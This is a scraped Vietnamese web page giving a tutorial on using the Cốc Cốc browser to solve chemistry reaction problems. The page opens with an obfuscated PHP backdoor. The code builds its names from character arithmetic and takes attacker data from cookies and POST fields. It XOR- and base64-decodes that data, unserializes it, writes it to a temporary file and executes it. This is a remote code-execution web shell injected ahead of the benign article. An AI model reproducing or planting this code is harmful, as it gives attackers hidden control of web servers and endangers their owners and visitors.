$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn giải hóa trên Cốc Cốc - Tải Chùa

Hướng dẫn giải hóa trên Cốc Cốc

Rate this post
Giải Hóa trên Cốc Cốc là tính năng tuyệt vời mà không phải trình duyệt nào cũng hỗ trợ. Bạn hoàn toàn có thể dùng Cốc Cốc để giải toán hay tìm kiếm mọi thông tin

Giải Hóa trên Cốc Cốc là tính năng tuyệt mà ít người biết và cũng không phải trình duyệt web nào cũng có. Người dùng hoàn toàn có thể sử dùng Cốc Cốc để giải các bài tập hóa học hay tìm kiếm các thông tin về chúng một cách nhanh chóng.

Hướng dẫn giải Hóa trên Cốc Cốc

Hướng dẫn giải Hóa trên Cốc Cốc

Cốc Cốc có khả năng giải được những bài tập toán và các bài tập hóa trên internet một cách nhanh chóng và cho ra đáp án chính xác nhất hiện nay. Với những trình duyệt Chrome hay FireFox không hỗ trợ việc này nhưng với Cốc Cốc bạn hoàn toàn làm được. 

Cách giải Hóa trên Cốc Cốc đơn giản

Trước hết để giải Hóa trên Cốc Cốc trước hết máy tính của bạn phải cài đặt trình duyệt Cốc Cốc. Nếu chứ có thì bạn tải cốc cốc về và cài đặt nhé.

Để có thể giải các bài tập hóa học hay toán trên Cốc Cốc người dùng cần ghi nhớ tên của các chất hóa học hoặc các phương trình toán học kèm théo đó là các cú pháp viết chính xác. 

Dạng 1: Nhập hóa chất kèm theo dấu (+), (=) phía sau các hóa chất.

Nếu bạn nhập 2 hóa chất cách nhau bằng dấu (+) thì Cốc Cốc sẽ trả về cho bạn 10 phản ứng phổ biến nhất mà các hóa chất này có thể tham gia.

Cách giải Hóa trên Cốc Cốc

Nhập hóa chất kèm theo dấu (+), (=) phía sau các hóa chất

Khi bạn viết dấu (=) phía trước các hóa chất thì Cốc Cốc sẽ tìm những phản ứng tạo ra sản phẩm bao gồm chất này.

Dạng 2: Hóa chất 1  = Hóa chất 2

Nếu nhập dấu (=) giữa hai hóa chất thì Cốc Cốc sẽ tìm những phản ứng biến đổi tương đương giữa 2 hóa chất này. 

Hướng dẫn giải Hóa trên trình duyệt Cốc Cốc

Hóa chất 1 = Hóa chất 2

Dạng 3: Nhập 1 hóa chất duy nhất

Nếu nhập 1 hóa chất duy nhất thì Cốc Cốc sẽ trả về 10 phản ứng phổ biến nhất trong chương trình phổ thông có chứa chất này.

Cách giải hóa trên Cốc Cốc

Nhập 1 hóa chất duy nhất

Dạng 4: Phản ứng không thể xảy ra.

Trong trường hợp nếu như phản ứng giữa các chất không thể xảy ra thì hệ thống sẽ giải thích vì sao phải ứng giữa các chất này không xảy ra được.

Hướng dẫn cách giải hóa trên Cốc Cốc

Phản ứng không thể xảy ra

Dạng 5: Phản ứng xảy ra trong dung dịch

VỚi phản ứng xảy ra trong dung dịch thì Cốc Cốc sẽ thể hiện phản ứng giữa các phân tử và chỉ rõ quá trình trao đổi ion

Hướng dẫn cách giải Hóa trên Cốc Cốc nhanh chóng

Phản ứng xảy ra trong dung dịch

Dạng 6: Chuỗi phản ứng

Các bài tập dạn tim một chất này đó trong chuỗi phản ứng thì nó luôn một vấ đề nan giản với nhiều người. Tuy nhiên với trình duyệt Cốc Cốc thì đó là điều vô cùng đơn giản những bài tập như bật bằng cách phân chia thành các phản ứng đơn lẻ với những dấu (=), (->). trong chuỗi phản ứng chứa những hóa chất chưa rõ tên và bạn phải tìm ra được hóa chất đó.

Chuỗi phản ứng giải Hóa trên Cốc Cốc

Chuỗi phản ứng giải Hóa trên Cốc Cốc

Không chỉ thế mà Cốc Cốc cũng hỗ trợ người dùng mở rộng thêm tính năng khác với 3 dạng phương trình gồm dạng thường, dạng phương trình ion, phương trình rút gọn,…

Cốc Cốc hỗ trợ cho bạn trong việc giải Hóa. Giải Hóa trên Cốc Cốc là một cách tốt nhất để hỗ trợ cho bạn nếu bạn còn yếu về Hóa Học.